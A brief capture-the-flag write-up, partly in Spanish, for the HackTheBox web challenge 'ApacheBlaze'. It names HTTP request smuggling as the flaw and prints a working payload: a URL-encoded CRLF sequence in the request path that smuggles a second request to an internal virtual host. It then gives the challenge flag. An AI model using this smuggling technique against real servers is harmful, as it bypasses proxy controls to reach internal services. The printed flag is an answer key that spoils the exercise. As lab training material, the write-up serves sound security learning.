ApacheBlaze

Challenge Description

Step into the ApacheBlaze universe, a world of arcade clicky games. Rumor has it that by playing certain games, you have the chance to win a grand prize. However, before you can dive into the fun, you’ll need to crack a puzzle.

Categoria: Web
Dificultad: Fácil
Puntos: 30

Solution

La aplicacion es vulnerable a request smuggling.

https://medium.com/@reinhardt.pwn/hackthebox-challenge-write-up-apacheblaze-a32643f19c45

GET /api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20/ HTTP/1.1
Host: 94.237.58.105:30327
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Connection: Keep-Alive

HTB{1t5_4ll_4b0ut_Th3_Cl1ck5}